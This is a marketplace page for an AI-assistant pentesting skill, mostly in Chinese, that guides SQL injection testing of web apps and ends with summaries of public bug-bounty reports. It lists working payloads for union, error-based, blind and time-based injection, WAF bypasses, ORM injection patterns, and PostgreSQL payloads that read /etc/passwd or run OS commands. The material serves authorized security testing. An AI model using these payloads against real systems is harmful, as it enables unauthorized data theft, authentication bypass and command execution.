Skill

pentest-sqli

Guides SQL injection penetration testing in web apps with payloads for union-based, blind, error-based, time-based attacks, ORM injections in Django/Rails/SQLAlchemy, bypasses, and checklists.

Python

Django

npx claudepluginhub yhy0/ghsa-skill-builder --plugin vuln-skills

Tool Access

This skill uses the workspace's default tool permissions.

Preview

当对 Web 应用进行 SQL 注入渗透测试时加载此 Skill。覆盖经典 SQLi、盲注、ORM 注入等攻击手法。

Supporting Assets

references/cases.md

SKILL.md

Similar Skills

sql-injection-testing

36.4k

Assesses SQL injection vulnerabilities in web apps via error-based, boolean-blind, and time-based tests using SQLMap, Burp Suite, and manual payloads to validate input sanitization.

antigravity-awesome-skills

webapp-sqlmap

108

Detects and exploits SQL injection vulnerabilities in web apps using sqlmap for authorized pentests, database enumeration, and data extraction.

4 files

threatmodel-skills

exploiting-sql-injection-vulnerabilities

5.9k

Identifies and exploits SQL injection vulnerabilities in web apps using manual techniques and sqlmap for MySQL, PostgreSQL, MSSQL, Oracle during authorized pentests.

3 files

cybersecurity-skills

Stats

Parent Repo Stars50

Parent Repo Forks8

Last CommitMar 14, 2026

Actions

View Source View Plugin View on GitHub View README

Help us improve

Share bugs, ideas, or general feedback.

SQL Injection Penetration Testing Patterns

当对 Web 应用进行 SQL 注入渗透测试时加载此 Skill。覆盖经典 SQLi、盲注、ORM 注入等攻击手法。

Attack Surface Discovery

高风险端点特征：

搜索/过滤功能：?search=, ?filter=, ?sort=, ?order= 参数
URL 路径中的 ID/标识符：/user/123, /item/abc
登录/认证表单：用户名、密码字段
API 端点：REST 查询参数、GraphQL 变量
后台管理面板：报表查询、数据导出功能

识别信号：

数据库错误信息泄露（MySQL: You have an error in your SQL syntax, PostgreSQL: ERROR: syntax error at or near）
参数添加单引号 ' 后响应异常（500 错误、空白页、内容变化）
数字参数可进行算术运算（id=2-1 等价于 id=1）
ORM 框架特征（Django QuerySet、Rails ActiveRecord、SQLAlchemy）

Exploitation Techniques

手动测试方法：

探测注入点：在每个参数后添加 '、"'、') 观察响应差异
确认注入：使用布尔条件 ' AND '1'='1 vs ' AND '1'='2 对比响应
判断注入类型：
- Error-based：错误信息中直接回显数据
- Union-based：' UNION SELECT NULL,NULL-- 逐步确定列数
- Boolean-blind：响应内容因条件真假而不同
- Time-blind：'; WAITFOR DELAY '0:0:5'--（MSSQL）或 ' AND SLEEP(5)--（MySQL）

Payload 构造：

# Union-based（先确定列数）
' ORDER BY 1-- 
' ORDER BY 2--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password,NULL FROM users--

# Error-based（MySQL）
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--

# Time-blind
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--

# Boolean-blind
' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--

Bypass 技巧：

WAF 绕过：/*!50000UNION*/、uNiOn SeLeCt、内联注释 /**/
编码绕过：URL 双重编码 %2527、Unicode 编码
空格替代：/**/、%09、%0a、+
关键字拆分：SEL/**/ECT、UN/**/ION

Second-order SQLi（二次注入）：

第一步：在注册/Profile 更新等写入操作中存入恶意 payload（如用户名 admin'--）
第二步：当应用在后续查询中使用已存储的数据（未重新转义）时触发注入
常见场景：注册用户名 → 密码修改时使用该用户名构造 SQL

ORM 特定注入：

Django Q 对象 _connector 注入：通过操纵 Q 对象的连接器注入任意 SQL
Django FilteredRelation：测试条件构造中的注入点
SQLAlchemy text() 拼接：检查原始 SQL 片段是否含用户输入
Rails ActiveRecord：.where("name = '#{params[:name]}'")、.order(params[:sort]) 未参数化
Hibernate HQL：createQuery("FROM User WHERE name = '" + input + "'") 拼接
Sequelize：.literal() 和 $raw 查询中的未转义输入

PostgreSQL 特定 Payload：

# Error-based
' AND 1=CAST((SELECT version()) AS int)--

# Time-blind
'; SELECT pg_sleep(5)--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--

# 文件读取
' UNION SELECT pg_read_file('/etc/passwd',0,1000)--

# 命令执行（需 superuser）
'; COPY cmd_exec FROM PROGRAM 'id';--

Detection Checklist

Impact Assessment

漏洞利用可达到的效果：

数据泄露：读取整个数据库（用户凭证、PII、业务数据）
认证绕过：' OR '1'='1 绕过登录验证
数据篡改：INSERT/UPDATE/DELETE 操作修改数据
权限提升：通过数据库写入 webshell 或执行系统命令（xp_cmdshell、LOAD_FILE/INTO OUTFILE）
横向移动：利用数据库连接信息访问其他内部服务

严重度判断：

Critical：可提取敏感数据（凭证、PII）、可执行系统命令、无需认证即可利用
High：需认证但可读取大量数据、盲注可确认敏感信息存在
Medium：注入存在但提取数据受限（如仅 boolean-blind 且 WAF 限制严格）

Real-World Cases

以下案例来自 HackerOne 公开披露的真实漏洞报告，展示了该类漏洞在实际目标中的表现形式。

Case 1: Django — SQL Injection in Django ORM via Unvalidated `_connector` in Q Objects

严重度: Critical | CWE: SQL Injection
摘要: A critical SQL injection vulnerability was discovered in the Django ORM's handling of Q objects. The internal WhereNode.as_sql method used unsafe string formatting to inject the query connector, which...
报告: https://hackerone.com/reports/3335709

Case 2: Django — SQL Injection when using FilteredRelation

严重度: Critical | CWE: SQL Injection
摘要: A SQL injection vulnerability was discovered in the Django framework when using the FilteredRelation feature. The vulnerability was located in the tests/filtered_relation/tests.py file. The vulnerabil...
报告: https://hackerone.com/reports/3292573

Case 3: IBM — SQL Injection vulnerability found on ibm.com endpoint

严重度: Critical | CWE: SQL Injection
摘要: A SQL injection vulnerability was found on an ibm.com endpoint. The vulnerability was reported to IBM, analyzed, and remediated.
报告: https://hackerone.com/reports/3578842

Case 4: IBM — SQL injection identified on IBM endpoint.

严重度: Critical | CWE: SQL Injection
摘要: SQL injection vulnerability was identified on an IBM endpoint. The issue was reported to IBM, analyzed, and remediated.
报告: https://hackerone.com/reports/2830573

Case 5: MTN Group — SQLi | in URL paths

严重度: Critical | CWE: SQL Injection
摘要: The vulnerability summary is as follows:

A SQL injection vulnerability was discovered in the customerId parameter of the URL path. The vulnerability was demonstrated by adding a quote in the customer...

报告: https://hackerone.com/reports/2958619

Case 6: MTN Group — SQL injection in URL path leads to Database Access

严重度: Critical | CWE: SQL Injection
摘要: The application https://corporate.admyntec.co.za/ was found to have an SQL injection vulnerability in its URL paths. User IDs, organization numbers, and other sensitive information were stored in the ...
报告: https://hackerone.com/reports/2633959

Case 7: Mars — SQLi At `███████` via `theme_name`

严重度: Critical | CWE: SQL Injection
摘要: A SQL injection vulnerability was discovered in a web application's theme selection endpoint through the "theme_name" parameter. Using SQLMap, the vulnerability was demonstrated to be exploitable thro...
报告: https://hackerone.com/reports/3293803

Case 8: Mars — SQLi at █████ parameter

严重度: Critical | CWE: SQL Injection
摘要: A SQL injection vulnerability was discovered in an items endpoint that accepted unauthenticated POST requests without CSRF validation. The vulnerability allowed execution of arbitrary SQL commands and...
报告: https://hackerone.com/reports/3277276

Case 9: Mars — Blind SQL Injection on █████ via URI Path

严重度: Critical | CWE: SQL Injection
摘要: The vulnerability involved a time-based SQL injection attack on the target system via the URI path. The attack capitalized on vulnerabilities in the application's interactions with the database, allow...
报告: https://hackerone.com/reports/2266081

Case 10: Mozilla — SQL Injection on prod.oidc-proxy.prod.webservices.mozgcp.net via invite_code parameter - Mozilla social inscription

严重度: Critical | CWE: SQL Injection
摘要: A SQL injection vulnerability was found in the invite_code parameter on prod.oidc-proxy.prod.webservices.mozgcp.net during Mozilla social inscription. Adding quotes to the parameter revealed the issue...
报告: https://hackerone.com/reports/2209130

pentest-sqli

Tool Access

Preview

Supporting Assets

SKILL.md

Similar Skills

Help us improve

Help us improve

pentest-sqli

Tool Access

Preview

Supporting Assets

SKILL.md

SQL Injection Penetration Testing Patterns

Attack Surface Discovery

Exploitation Techniques

Detection Checklist

Impact Assessment

Real-World Cases

Case 1: Django — SQL Injection in Django ORM via Unvalidated _connector in Q Objects

Case 2: Django — SQL Injection when using FilteredRelation

Case 3: IBM — SQL Injection vulnerability found on ibm.com endpoint

Case 4: IBM — SQL injection identified on IBM endpoint.

Case 5: MTN Group — SQLi | in URL paths

Case 6: MTN Group — SQL injection in URL path leads to Database Access

Case 7: Mars — SQLi At ███████ via theme_name

Case 8: Mars — SQLi at █████ parameter

Case 9: Mars — Blind SQL Injection on █████ via URI Path

Case 10: Mozilla — SQL Injection on prod.oidc-proxy.prod.webservices.mozgcp.net via invite_code parameter - Mozilla social inscription

Similar Skills

Help us improve

SQL Injection Penetration Testing Patterns

Attack Surface Discovery

Exploitation Techniques

Detection Checklist

Impact Assessment

Real-World Cases

Case 1: Django — SQL Injection in Django ORM via Unvalidated _connector in Q Objects

Case 2: Django — SQL Injection when using FilteredRelation

Case 3: IBM — SQL Injection vulnerability found on ibm.com endpoint

Case 4: IBM — SQL injection identified on IBM endpoint.

Case 5: MTN Group — SQLi | in URL paths

Case 6: MTN Group — SQL injection in URL path leads to Database Access

Case 7: Mars — SQLi At ███████ via theme_name

Case 8: Mars — SQLi at █████ parameter

Case 9: Mars — Blind SQL Injection on █████ via URI Path

Case 10: Mozilla — SQL Injection on prod.oidc-proxy.prod.webservices.mozgcp.net via invite_code parameter - Mozilla social inscription

Case 1: Django — SQL Injection in Django ORM via Unvalidated `_connector` in Q Objects

Case 7: Mars — SQLi At `███████` via `theme_name`

Case 1: Django — SQL Injection in Django ORM via Unvalidated `_connector` in Q Objects

Case 7: Mars — SQLi At `███████` via `theme_name`